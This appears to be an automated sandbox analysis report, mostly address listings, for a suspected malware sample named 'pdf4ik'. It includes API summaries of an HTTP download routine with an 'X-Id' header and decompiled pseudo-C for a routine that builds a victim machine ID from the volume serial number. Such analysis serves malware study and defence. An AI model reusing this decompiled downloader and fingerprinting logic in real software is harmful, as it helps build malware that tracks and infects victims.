                                        0x29d91ad2
                                        0x29d91ad7
                                        0x29d91ad7
                                        0x29d91ac9
                                        0x29d91ada
                                        0x29d91ae3
                                        0x29d91ae5
                                        0x29d91ae5
                                        0x29d91af4
                                        0x29d91afa
                                        0x29d91b07
                                        0x29d91b0b
                                        0x29d91b10
                                        0x29d91b1b
                                        0x29d91b23
                                        0x29d91b24
                                        0x29d91b29
                                        0x29d91b29
                                        0x29d91b2c
                                        0x29d91b34
                                        0x29d91b63
                                        0x29d91b6d
                                        0x29d91b77
                                        0x29d91b7e
                                        0x29d91b83
                                        0x29d91b89
                                        0x29d91b90
                                        0x29d91b90
                                        0x29d91b36
                                        0x29d91b42
                                        0x29d91b48
                                        0x29d91b4d
                                        0x29d91b51
                                        0x29d91b51
                                        0x29d91b9e
                                        0x29d91ba4
                                        0x29d91bab
                                        0x29d91bad
                                        0x29d91bba
                                        0x29d91bc0
                                        0x29d91bc8
                                        0x29d91bc9
                                        0x29d91bce
                                        0x29d91bce
                                        0x29d91bd1
                                        0x29d91bdb
                                        0x29d91be5
                                        0x29d91be5
                                        0x29d91bec
                                        0x29d91bf6
                                        0x29d91bf8
                                        0x29d91c02
                                        0x29d91c08
                                        0x29d91c0a
                                        0x29d91c10
                                        0x29d91c11
                                        0x29d91c16
                                        0x29d91c16
                                        0x29d91c08
                                        0x29d91c29
                                        0x29d91c2e
                                        0x29d91c37
                                        0x29d91c68
                                        0x29d91c72
                                        0x29d91c7c
                                        0x29d91c83
                                        0x29d91c88
                                        0x29d91c8e
                                        0x29d91c95
                                        0x29d91c95
                                        0x29d91c39
                                        0x29d91c3b
                                        0x29d91c44
                                        0x29d91c4a
                                        0x29d91c4f
                                        0x29d91c53
                                        0x29d91c53
                                        0x29d91ca3
                                        0x29d91ca9
                                        0x29d91cb4
                                        0x29d91cb6
                                        0x29d91cc3
                                        0x29d91cc9
                                        0x29d91cd1
                                        0x29d91cd2
                                        0x29d91cd7
                                        0x29d91cd7
                                        0x29d91cda
                                        0x29d91ce4
                                        0x29d91cee
                                        0x29d91cee
                                        0x29d91cf5
                                        0x29d91d02
                                        0x29d91d04
                                        0x29d91d11
                                        0x29d91d17
                                        0x29d91d19
                                        0x29d91d1f
                                        0x29d91d20
                                        0x29d91d25
                                        0x29d91d25
                                        0x29d91d17
                                        0x29d91d28
                                        0x29d91d31
                                        0x29d91d64
                                        0x29d91d6e
                                        0x29d91d78
                                        0x29d91d7f
                                        0x29d91d84
                                        0x29d91d8a
                                        0x29d91d91
                                        0x29d91d91
                                        0x29d91d33
                                        0x29d91d3c
                                        0x29d91d42
                                        0x29d91d47
                                        0x29d91d4b
                                        0x29d91d4b
                                        0x29d91d9f
                                        0x29d91da5
                                        0x29d91db0
                                        0x29d91db2
                                        0x29d91dbf
                                        0x29d91dc7
                                        0x29d91dc8
                                        0x29d91dcd
                                        0x29d91dcd
                                        0x29d91dd0
                                        0x29d91dda
                                        0x29d91de4
                                        0x29d91de4
                                        0x29d91df0
                                        0x29d91dfd
                                        0x29d91e05
                                        0x29d91e07
                                        0x29d91e0d
                                        0x29d91e0e
                                        0x29d91e13
                                        0x29d91e13
                                        0x29d91e16
                                        0x29d91e20
                                        0x29d91e2a
                                        0x29d91e2a
                                        0x29d91e31
                                        0x29d91e3d
                                        0x29d91e3f
                                        0x29d91e3f
                                        0x29d91e46
                                        0x29d91e4c
                                        0x29d91e52
                                        0x29d91e54
                                        0x29d91e54
                                        0x29d91e58
                                        0x29d91e62
                                        0x29d91ec7
                                        0x29d91eca
                                        0x29d91ecd
                                        0x29d91ecf
                                        0x29d91ecf
                                        0x29d91ee1
                                        0x29d91e64
                                        0x29d91e6a
                                        0x29d91e6f
                                        0x29d91e76
                                        0x29d91e78
                                        0x29d91e78
                                        0x29d91e83
                                        0x29d91e89
                                        0x29d91e8d
                                        0x29d91e99
                                        0x29d91ea1
                                        0x29d91ea2
                                        0x29d91ea7
                                        0x29d91ea7
                                        0x29d91eaa
                                        0x29d91eb4
                                        0x29d91ebe
                                        0x29d91ebe
                                        0x29d91ee7
                                        0x29d91ef3
                                        0x29d91ef5
                                        0x29d91ef5
                                        0x29d91efb
                                        0x29d91efc
                                        0x29d91f01
                                        0x29d91f04
                                        0x29d91f06
                                        0x29d91f12
                                        0x29d91f14
                                        0x29d91f14
                                        0x29d91f20
                                        0x29d91f2a
                                        0x29d91f32
                                        0x29d91f3f
                                        0x29d9220a
                                        0x29d9220a
                                        0x29d92215
                                        0x29d92218
                                        0x29d92225
                                        0x29d92228
                                        0x29d92232
                                        0x29d92238
                                        0x29d9223a
                                        0x29d92240
                                        0x29d92241
                                        0x29d92246
                                        0x29d92246
                                        0x29d9224b
                                        0x29d92251
                                        0x29d92257
                                        0x29d9225e
                                        0x29d92264
                                        0x29d9226c
                                        0x29d9226d
                                        0x29d92272
                                        0x29d92272
                                        0x29d92275
                                        0x29d9227b
                                        0x29d92281
                                        0x29d92288
                                        0x29d9228e
                                        0x29d92296
                                        0x29d92297
                                        0x29d9229c
                                        0x29d9229c
                                        0x29d9229f
                                        0x29d922a5
                                        0x29d922ab
                                        0x29d922b2
                                        0x29d922b8
                                        0x29d922ba
                                        0x29d922c0
                                        0x29d922c1
                                        0x29d922c6
                                        0x29d922c6
                                        0x29d922c9
                                        0x29d922cf
                                        0x29d922d5
                                        0x29d922dc
                                        0x29d922e2
                                        0x29d922ea
                                        0x29d922eb
                                        0x29d922f0
                                        0x29d922f0
                                        0x29d922f3
                                        0x29d922f9
                                        0x29d922ff
                                        0x29d92306
                                        0x29d9230c
                                        0x29d92314
                                        0x29d92315
                                        0x29d9231a
                                        0x29d9231a
                                        0x29d9231d
                                        0x29d92323
                                        0x29d92329
                                        0x29d92330
                                        0x29d92336
                                        0x29d92338
                                        0x29d9233e
                                        0x29d9233f
                                        0x29d92344
                                        0x29d92344
                                        0x29d92347
                                        0x29d9234d
                                        0x29d92353
                                        0x29d9235a
                                        0x29d9235d
                                        0x29d92362
                                        0x29d92363
                                        0x29d92368
                                        0x29d92368
                                        0x29d9236b
                                        0x29d9236e
                                        0x29d92371
                                        0x29d92375
                                        0x29d92378
                                        0x29d9237d
                                        0x29d9237e
                                        0x29d92383
                                        0x29d92386
                                        0x00000000
                                        0x29d91f45
                                        0x29d91f45
                                        0x29d91f51
                                        0x29d91f53
                                        0x29d91f53
                                        0x29d91f59
                                        0x29d91f6b
                                        0x29d91f71
                                        0x29d91f73
                                        0x29d91f7b
                                        0x29d921fd
                                        0x29d92204
                                        0x00000000
                                        0x29d91f81
                                        0x29d91f88
                                        0x29d91f8e
                                        0x29d91f90
                                        0x29d91f90
                                        0x29d91fa6
                                        0x29d91fac
                                        0x29d91fb0
                                        0x29d921f6
                                        0x29d921f7
                                        0x00000000
                                        0x29d91fb6
                                        0x29d91fbc
                                        0x29d91fcd
                                        0x29d91fd1
                                        0x29d91fd6
                                        0x29d91fde
                                        0x29d91fe8
                                        0x29d91ff0
                                        0x29d91ff1
                                        0x29d91ff6
                                        0x29d91ff6
                                        0x29d91ff9
                                        0x29d91fff
                                        0x29d92009
                                        0x29d92013
                                        0x29d92020
                                        0x29d92022
                                        0x29d92022
                                        0x29d92036
                                        0x29d92045
                                        0x29d9204d
                                        0x29d92054
                                        0x29d92060
                                        0x29d92072
                                        0x29d920ff
                                        0x29d92100
                                        0x29d92105
                                        0x29d92108
                                        0x29d9210d
                                        0x00000000
                                        0x00000000
                                        0x29d92113
                                        0x29d92115
                                        0x29d921da
                                        0x29d921db
                                        0x29d921e7
                                        0x29d921eb
                                        0x29d921f0
                                        0x00000000
                                        0x29d921f0
                                        0x29d9211b
                                        0x29d9212f
                                        0x29d92135
                                        0x29d92137
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9213d
                                        0x29d9213d
                                        0x29d9213d
                                        0x29d92143
                                        0x29d92145
                                        0x00000000
                                        0x00000000
                                        0x29d92158
                                        0x29d92168
                                        0x29d9216d
                                        0x29d92178
                                        0x29d9217c
                                        0x29d92181
                                        0x29d92185
                                        0x29d9218c
                                        0x29d92194
                                        0x29d92195
                                        0x29d9219a
                                        0x29d9219a
                                        0x29d9219d
                                        0x29d921b1
                                        0x29d921bb
                                        0x29d921c5
                                        0x29d921cc
                                        0x29d921d2
                                        0x29d921d4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d921d4
                                        0x00000000
                                        0x29d92078
                                        0x29d92078
                                        0x29d92078
                                        0x29d92085
                                        0x29d92090
                                        0x29d9209b
                                        0x29d920a6
                                        0x29d920b1
                                        0x29d920bc
                                        0x29d920c7
                                        0x29d920d2
                                        0x29d920dd
                                        0x29d920e5
                                        0x29d920ed
                                        0x29d920f2
                                        0x29d9238c
                                        0x29d9238f
                                        0x29d92397
                                        0x29d92398
                                        0x29d92399
                                        0x29d923a7
                                        0x29d923a7
                                        0x29d92072
                                        0x29d91fb0
                                        0x29d91f7b

                                        APIs
                                          • Part of subcall function 29D891D0: _memmove.LIBCMT ref: 29D89203
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                        • DeleteUrlCacheEntry.WININET(?), ref: 29D91E46
                                        • DeleteUrlCacheEntry.WININET(?), ref: 29D91E58
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D89517
                                          • Part of subcall function 29D894C0: _memmove.LIBCMT ref: 29D89578
                                        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 29D91E83
                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 29D91EDB
                                        • StrCmpCA.SHLWAPI(?,https), ref: 29D91F20
                                        • InternetConnectA.WININET(00000000,?,00000000,00000000,00000000,00000003,-04800000,00000000), ref: 29D91F6B
                                        • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,-04800000,00000000), ref: 29D91FA6
                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 29D92036
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 29D92045
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 29D9206A
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 29D9212F
                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 29D921CC
                                        • InternetCloseHandle.WININET(00000000), ref: 29D921DB
                                        • InternetCloseHandle.WININET(00000000), ref: 29D921F7
                                        • InternetCloseHandle.WININET(00000000), ref: 29D92204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Http$CloseHandleOpenRequest$CacheDeleteEntryFileReadXinvalid_argument_memmovestd::_$ConnectHeadersInfoQuerySend
                                        • String ID: /$ERROR$GET$X-Id: $http://$https$https://
                                        • API String ID: 1077051434-683878127
                                        • Opcode ID: 42ac30d55f53778799bf4be25fa1bb41fa76074ad6de785fdfd91bfcd185898d
                                        • Instruction ID: e20686c158c56b502149ce21da36632993b83c71596f9eb7faf0fd69f1ab660f
                                        • Opcode Fuzzy Hash: 42ac30d55f53778799bf4be25fa1bb41fa76074ad6de785fdfd91bfcd185898d
                                        • Instruction Fuzzy Hash: EB82A9B1D112689AFB20DB24CC84BDEB7B4BF15300F1081EDD54967682DB745B8AEFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA2920 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 361memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1842 29da2920-29da2989 GetWindowsDirectoryA 1843 29da298b 1842->1843 1844 29da2992-29da2a87 GetVolumeInformationA GetProcessHeap HeapAlloc 1842->1844 1843->1844 1845 29da2a8d-29da2a9c 1844->1845 1846 29da2b32-29da2b53 wsprintfA 1844->1846 1847 29da2aa0-29da2aa5 1845->1847 1848 29da2b56-29da2b5b 1846->1848 1847->1847 1850 29da2aa7-29da2aae 1847->1850 1848->1848 1849 29da2b5d-29da2b7e call 29d95540 1848->1849 1860 29da2c9d 1849->1860 1861 29da2b84-29da2b9b 1849->1861 1852 29da2aba-29da2abf 1850->1852 1853 29da2ab0-29da2ab5 call 29dad440 1850->1853 1856 29da2adf-29da2ae1 1852->1856 1857 29da2ac1-29da2acf call 29d89750 1852->1857 1853->1852 1858 29da2ae3-29da2ae9 1856->1858 1859 29da2ad1-29da2ad9 1856->1859 1857->1859 1872 29da2b19-29da2b20 1857->1872 1865 29da2aeb-29da2af0 1858->1865 1866 29da2af2-29da2af7 1858->1866 1863 29da2adb-29da2add 1859->1863 1864 29da2af9 1859->1864 1871 29da2ca4-29da2cac 1860->1871 1867 29da2b9d 1861->1867 1868 29da2ba3-29da2ba5 1861->1868 1870 29da2afb-29da2b0d call 29db0010 1863->1870 1864->1870 1865->1872 1866->1872 1867->1868 1873 29da2bc8-29da2bfb call 29da3460 call 29d951e0 call 29da34d0 1868->1873 1874 29da2ba7-29da2ba9 1868->1874 1889 29da2b0f-29da2b11 1870->1889 1890 29da2b13 1870->1890 1875 29da2cae-29da2cc6 1871->1875 1879 29da2b26-29da2b2d 1872->1879 1880 29da2e64-29da2e80 call 29dadf46 1872->1880 1906 29da2c00-29da2c4e call 29d951e0 call 29da42c0 call 29d89980 1873->1906 1877 29da2bb0-29da2bc6 call 29dafc0b 1874->1877 1881 29da2cca-29da2cd1 1875->1881 1877->1873 1886 29da2e5c-29da2e61 call 29dadf3b 1879->1886 1887 29da2ce2-29da2cff 1881->1887 1888 29da2cd3-29da2cdf call 29dadf3b 1881->1888 1886->1880 1896 29da2d10-29da2d2d 1887->1896 1897 29da2d01-29da2d0d call 29dadf3b 1887->1897 1888->1887 1898 29da2b15 1889->1898 1890->1898 1903 29da2d3e-29da2d5b 1896->1903 1904 29da2d2f-29da2d3b call 29dadf3b 1896->1904 1897->1896 1898->1872 1907 29da2d6c-29da2d89 1903->1907 1908 29da2d5d-29da2d69 call 29dadf3b 1903->1908 1904->1903 1939 29da2cc8 1906->1939 1940 29da2c50-29da2c57 1906->1940 1913 29da2d9a-29da2db7 1907->1913 1914 29da2d8b-29da2d97 call 29dadf3b 1907->1914 1908->1907 1919 29da2dc8-29da2ddc 1913->1919 1920 29da2db9-29da2dc5 call 29dadf3b 1913->1920 1914->1913 1924 29da2dde-29da2de2 1919->1924 1925 29da2e4c-29da2e53 1919->1925 1920->1919 1929 29da2def-29da2e02 1924->1929 1930 29da2de4-29da2dec call 29dadf3b 1924->1930 1925->1880 1927 29da2e55-29da2e5b 1925->1927 1927->1886 1931 29da2e30-29da2e4a 1929->1931 1932 29da2e04-29da2e2e call 29dae1f0 1929->1932 1930->1929 1931->1880 1932->1880 1939->1881 1941 29da2c68-29da2c84 1940->1941 1942 29da2c59-29da2c65 call 29dadf3b 1940->1942 1941->1871 1944 29da2c86-29da2c9b call 29dae1f0 1941->1944 1942->1941 1944->1875
                                        C-Code - Quality: 72%
                                        			E29DA2920(signed short* __edi) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v284;
				signed short _v292;
				signed short _v296;
				signed char* _v312;
				signed int _v315;
				signed int _v316;
				signed int _v317;
				signed int _v318;
				signed short _v320;
				signed int _v324;
				signed short _v340;
				signed short _v348;
				signed short _v352;
				signed short _v368;
				signed short _v376;
				signed short _v380;
				signed short _v396;
				signed short _v404;
				signed short _v408;
				signed short _v424;
				signed short _v432;
				signed short _v436;
				signed short _v452;
				intOrPtr _v460;
				signed short _v480;
				long _v484;
				char _v485;
				short _v487;
				char _v488;
				long _v492;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t128;
				signed int _t136;
				signed int _t138;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				signed int _t152;
				intOrPtr* _t159;
				CHAR* _t162;
				signed short _t166;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t173;
				signed short _t200;
				signed short _t201;
				signed short _t203;
				signed int _t209;
				signed char* _t210;
				signed char** _t211;
				signed short _t212;
				void* _t213;
				char _t217;
				signed char* _t219;
				signed char* _t220;
				intOrPtr _t237;
				char* _t241;
				signed short* _t248;
				CHAR* _t251;
				signed char* _t252;
				intOrPtr* _t257;
				void* _t258;
				signed short _t259;
				signed int _t260;
				void* _t261;
				void* _t262;
				void* _t263;

				_t248 = __edi;
				_push(0xffffffff);
				_push(E29DC24FD);
				_push( *[fs:0x0]);
				_t262 = _t261 - 0x1dc;
				_t127 =  *0x29dd5664; // 0xd9555f04
				_t128 = _t127 ^ _t260;
				_v20 = _t128;
				_push(_t128);
				 *[fs:0x0] =  &_v16;
				_v484 = 0;
				_v492 = 0;
				_v292 = 0xf;
				_v296 = 0;
				_v312 = 0;
				_v8 = 0;
				if(GetWindowsDirectoryA( &_v284, 0x104) == 0) {
					_v284 = 0x43;
				}
				_v488 = _v284;
				_v487 = 0x5c3a;
				_v485 = 0;
				GetVolumeInformationA( &_v488, 0, 0,  &_v492, 0, 0, 0, 0); // executed
				_t136 = _v492 * 0x14a30b - 0x69427551;
				_t209 = _t136;
				_t138 = _t136 * 0x14a30b - 0x69427551;
				_v324 = _t138;
				_t146 = (((_t138 * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551;
				_v318 = _t146;
				_t148 = _t146 * 0x14a30b - 0x69427551;
				_v317 = _t148;
				_t150 = _t148 * 0x14a30b - 0x69427551;
				_v316 = _t150;
				_t152 = _t150 * 0x14a30b - 0x69427551;
				_v315 = _t152;
				_v492 = (_t152 * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551;
				_t251 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_t159 = 0;
				if(_t251 != 0) {
					wsprintfA(_t251, "%08lX%04lX%lu-", _t209, _v324 & 0x0000ffff, _v318);
					_t162 = _t251;
					_t263 = _t262 + 0x14;
					_t38 =  &(_t162[1]); // 0x1
					_t241 = _t38;
					do {
						_t217 =  *_t162;
						_t162 =  &(_t162[1]);
					} while (_t217 != 0);
					E29D95540(_t251,  &_v312, _t162 - _t241);
					_t166 = _v292;
					_t252 = _v312;
					_t210 = _t252;
					if(_t166 >= 0x10) {
						_t219 = _t252;
					} else {
						_t210 =  &_v312;
						_t219 = _t210;
					}
					_t220 =  &(_t219[_v296]);
					_v484 = _t220;
					if(_t166 < 0x10) {
						_t252 =  &_v312;
					}
					if(_t252 == _t220) {
						L31:
						_t167 = E29DA3460(_t210, _t248,  &_v480); // executed
						_v8 = 1;
						_v484 = E29D951E0(0x14, _t167,  &_v452, 0x11);
						_v8 = 2;
						_t169 = E29DA34D0(_t210, _t248,  &_v396); // executed
						_v8 = 3;
						_t170 = E29D951E0(0, _t169,  &_v424, 0x18);
						_t211 =  &_v312;
						_v8 = 4;
						_t171 = E29DA42C0(_t170, _t211, _t170,  &_v368);
						_t244 =  &_v340;
						_v8 = 5;
						_t173 = E29D89980(_v484, _t171,  &_v340);
						_t262 = _t263 + 8;
						_t257 = _t173;
						if(_t211 == _t257) {
							_t212 = 0;
						} else {
							if(_v292 >= 0x10) {
								_push(_v312);
								E29DADF3B();
								_t262 = _t262 + 4;
							}
							_t212 = 0;
							_v292 = 0xf;
							_v296 = 0;
							_v312 = 0;
							if( *(_t257 + 0x14) >= 0x10) {
								_v312 =  *_t257;
								 *_t257 = 0;
							} else {
								E29DAE1F0( &_v312, _t257,  *(_t257 + 0x10) + 1);
								_t262 = _t262 + 0xc;
							}
							_v296 =  *(_t257 + 0x10);
							_t244 =  *(_t257 + 0x14);
							_v292 =  *(_t257 + 0x14);
							 *(_t257 + 0x10) = _t212;
							 *(_t257 + 0x14) = _t212;
						}
						if(_v320 >= 0x10) {
							_push(_v340);
							E29DADF3B();
							_t262 = _t262 + 4;
						}
						_v320 = 0xf;
						_v324 = _t212;
						_v340 = _t212;
						if(_v348 >= 0x10) {
							_push(_v368);
							E29DADF3B();
							_t262 = _t262 + 4;
						}
						_v348 = 0xf;
						_v352 = _t212;
						_v368 = _t212;
						if(_v404 >= 0x10) {
							_t244 = _v424;
							_push(_v424);
							E29DADF3B();
							_t262 = _t262 + 4;
						}
						_v404 = 0xf;
						_v408 = _t212;
						_v424 = _t212;
						if(_v376 >= 0x10) {
							_push(_v396);
							E29DADF3B();
							_t262 = _t262 + 4;
						}
						_v376 = 0xf;
						_v380 = _t212;
						_v396 = _t212;
						if(_v432 >= 0x10) {
							_push(_v452);
							E29DADF3B();
							_t262 = _t262 + 4;
						}
						_v432 = 0xf;
						_v436 = _t212;
						_v452 = _t212;
						if(_v460 >= 0x10) {
							_t244 = _v480;
							_push(_v480);
							E29DADF3B();
							_t262 = _t262 + 4;
						}
						_t248[0xa] = 0xf;
						_t248[8] = _t212;
						 *_t248 = _t212;
						if(_t248 ==  &_v312) {
							if(_v292 < 0x10) {
								goto L61;
							}
							_push(_v312);
							L60:
							E29DADF3B();
							goto L61;
						} else {
							if(_t248[0xa] >= 0x10) {
								_push( *_t248);
								E29DADF3B();
								_t262 = _t262 + 4;
							}
							_t248[0xa] = 0xf;
							_t248[8] = _t212;
							 *_t248 = _t212;
							if(_v292 >= 0x10) {
								_t244 = _v296;
								 *_t248 = _v312;
								_t248[8] = _v296;
								_t248[0xa] = _v292;
							} else {
								E29DAE1F0(_t248,  &_v312, _v296 + 1);
								_t244 = _v296;
								_t248[8] = _v296;
								_t248[0xa] = _v292;
							}
							L61:
							 *[fs:0x0] = _v16;
							_pop(_t258);
							_pop(_t213);
							return E29DADF46(_t248, _t213, _v20 ^ _t260, _t244, _t248, _t258);
						}
					} else {
						_t210 = _t210 - _t252;
						do {
							_t252[_t210] = E29DAFC0B( *_t252 & 0x000000ff);
							_t252 =  &(_t252[1]);
							_t263 = _t263 + 4;
						} while (_t252 != _v484);
						goto L31;
					}
				}
				_t248[0xa] = 0xf;
				_t248[8] = 0;
				 *_t248 = 0;
				_t26 = _t159 + 1; // 0x1
				_t244 = _t26;
				do {
					_t237 =  *_t159;
					_t159 = _t159 + 1;
				} while (_t237 != 0);
				_t259 = _t159 - _t244;
				if(_t259 > 0xfffffffe) {
					E29DAD440("string too long");
				}
				_t200 = _t248[0xa];
				if(_t200 >= _t259) {
					if(_t259 != 0) {
						goto L9;
					}
					_t248[8] = _t259;
					if(_t200 < 0x10) {
						 *_t248 = 0;
					} else {
						 *( *_t248) = 0;
					}
				} else {
					E29D89750(_t248, _t259, _t248[8]);
					if(_t259 == 0) {
						L20:
						if(_v292 < 0x10) {
							goto L61;
						}
						_t244 = _v312;
						_push(_v312);
						goto L60;
					}
					L9:
					if(_t248[0xa] < 0x10) {
						_t201 = _t248;
					} else {
						_t201 =  *_t248;
					}
					E29DB0010(_t201, 0, _t259);
					_t262 = _t262 + 0xc;
					_t248[8] = _t259;
					if(_t248[0xa] < 0x10) {
						_t203 = _t248;
					} else {
						_t203 =  *_t248;
					}
					 *((char*)(_t203 + _t259)) = 0;
				}
			}













































































                                        0x29da2920
                                        0x29da2923
                                        0x29da2925
                                        0x29da2930
                                        0x29da2931
                                        0x29da2937
                                        0x29da293c
                                        0x29da293e
                                        0x29da2943
                                        0x29da2947
                                        0x29da294f
                                        0x29da2955
                                        0x29da295b
                                        0x29da2965
                                        0x29da296b
                                        0x29da297e
                                        0x29da2989
                                        0x29da298b
                                        0x29da298b
                                        0x29da29ac
                                        0x29da29b2
                                        0x29da29bb
                                        0x29da29c2
                                        0x29da29d4
                                        0x29da29d9
                                        0x29da29e1
                                        0x29da29e6
                                        0x29da2a14
                                        0x29da2a19
                                        0x29da2a25
                                        0x29da2a2a
                                        0x29da2a36
                                        0x29da2a3b
                                        0x29da2a47
                                        0x29da2a4c
                                        0x29da2a6e
                                        0x29da2a81
                                        0x29da2a83
                                        0x29da2a87
                                        0x29da2b48
                                        0x29da2b4e
                                        0x29da2b50
                                        0x29da2b53
                                        0x29da2b53
                                        0x29da2b56
                                        0x29da2b56
                                        0x29da2b58
                                        0x29da2b59
                                        0x29da2b68
                                        0x29da2b6d
                                        0x29da2b73
                                        0x29da2b79
                                        0x29da2b7e
                                        0x29da2c9d
                                        0x29da2b84
                                        0x29da2b84
                                        0x29da2b8a
                                        0x29da2b8a
                                        0x29da2b8c
                                        0x29da2b92
                                        0x29da2b9b
                                        0x29da2b9d
                                        0x29da2b9d
                                        0x29da2ba5
                                        0x29da2bc8
                                        0x29da2bce
                                        0x29da2be2
                                        0x29da2beb
                                        0x29da2bf7
                                        0x29da2bfb
                                        0x29da2c0c
                                        0x29da2c10
                                        0x29da2c1e
                                        0x29da2c24
                                        0x29da2c28
                                        0x29da2c2f
                                        0x29da2c35
                                        0x29da2c40
                                        0x29da2c45
                                        0x29da2c48
                                        0x29da2c4e
                                        0x29da2cc8
                                        0x29da2c50
                                        0x29da2c57
                                        0x29da2c5f
                                        0x29da2c60
                                        0x29da2c65
                                        0x29da2c65
                                        0x29da2c68
                                        0x29da2c6a
                                        0x29da2c74
                                        0x29da2c7a
                                        0x29da2c84
                                        0x29da2ca6
                                        0x29da2cac
                                        0x29da2c86
                                        0x29da2c93
                                        0x29da2c98
                                        0x29da2c98
                                        0x29da2cb1
                                        0x29da2cb7
                                        0x29da2cba
                                        0x29da2cc0
                                        0x29da2cc3
                                        0x29da2cc3
                                        0x29da2cd1
                                        0x29da2cd9
                                        0x29da2cda
                                        0x29da2cdf
                                        0x29da2cdf
                                        0x29da2ce9
                                        0x29da2cf3
                                        0x29da2cf9
                                        0x29da2cff
                                        0x29da2d07
                                        0x29da2d08
                                        0x29da2d0d
                                        0x29da2d0d
                                        0x29da2d17
                                        0x29da2d21
                                        0x29da2d27
                                        0x29da2d2d
                                        0x29da2d2f
                                        0x29da2d35
                                        0x29da2d36
                                        0x29da2d3b
                                        0x29da2d3b
                                        0x29da2d45
                                        0x29da2d4f
                                        0x29da2d55
                                        0x29da2d5b
                                        0x29da2d63
                                        0x29da2d64
                                        0x29da2d69
                                        0x29da2d69
                                        0x29da2d73
                                        0x29da2d7d
                                        0x29da2d83
                                        0x29da2d89
                                        0x29da2d91
                                        0x29da2d92
                                        0x29da2d97
                                        0x29da2d97
                                        0x29da2da1
                                        0x29da2dab
                                        0x29da2db1
                                        0x29da2db7
                                        0x29da2db9
                                        0x29da2dbf
                                        0x29da2dc0
                                        0x29da2dc5
                                        0x29da2dc5
                                        0x29da2dce
                                        0x29da2dd5
                                        0x29da2dd8
                                        0x29da2ddc
                                        0x29da2e53
                                        0x00000000
                                        0x00000000
                                        0x29da2e5b
                                        0x29da2e5c
                                        0x29da2e5c
                                        0x00000000
                                        0x29da2dde
                                        0x29da2de2
                                        0x29da2de6
                                        0x29da2de7
                                        0x29da2dec
                                        0x29da2dec
                                        0x29da2def
                                        0x29da2df6
                                        0x29da2df9
                                        0x29da2e02
                                        0x29da2e36
                                        0x29da2e42
                                        0x29da2e44
                                        0x29da2e47
                                        0x29da2e04
                                        0x29da2e14
                                        0x29da2e19
                                        0x29da2e28
                                        0x29da2e2b
                                        0x29da2e2b
                                        0x29da2e64
                                        0x29da2e69
                                        0x29da2e71
                                        0x29da2e72
                                        0x29da2e80
                                        0x29da2e80
                                        0x29da2ba7
                                        0x29da2ba7
                                        0x29da2bb0
                                        0x29da2bb9
                                        0x29da2bbc
                                        0x29da2bbd
                                        0x29da2bc0
                                        0x00000000
                                        0x29da2bb0
                                        0x29da2ba5
                                        0x29da2a8d
                                        0x29da2a94
                                        0x29da2a97
                                        0x29da2a99
                                        0x29da2a99
                                        0x29da2aa0
                                        0x29da2aa0
                                        0x29da2aa2
                                        0x29da2aa3
                                        0x29da2aa9
                                        0x29da2aae
                                        0x29da2ab5
                                        0x29da2ab5
                                        0x29da2aba
                                        0x29da2abf
                                        0x29da2ae1
                                        0x00000000
                                        0x00000000
                                        0x29da2ae3
                                        0x29da2ae9
                                        0x29da2af4
                                        0x29da2aeb
                                        0x29da2aed
                                        0x29da2aed
                                        0x29da2ac1
                                        0x29da2ac8
                                        0x29da2acf
                                        0x29da2b19
                                        0x29da2b20
                                        0x00000000
                                        0x00000000
                                        0x29da2b26
                                        0x29da2b2c
                                        0x00000000
                                        0x29da2b2c
                                        0x29da2ad1
                                        0x29da2ad9
                                        0x29da2af9
                                        0x29da2adb
                                        0x29da2adb
                                        0x29da2adb
                                        0x29da2aff
                                        0x29da2b04
                                        0x29da2b07
                                        0x29da2b0d
                                        0x29da2b13
                                        0x29da2b0f
                                        0x29da2b0f
                                        0x29da2b0f
                                        0x29da2b15
                                        0x29da2b15

                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,D9555F04,00000010), ref: 29DA2981
                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 29DA29C2
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 29DA2A74
                                        • HeapAlloc.KERNEL32(00000000), ref: 29DA2A7B
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA2AB5
                                        • _memmove.LIBCMT ref: 29DA2AFF
                                        • wsprintfA.USER32 ref: 29DA2B48
                                        • _memmove.LIBCMT ref: 29DA2C93
                                        • _memmove.LIBCMT ref: 29DA2E14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
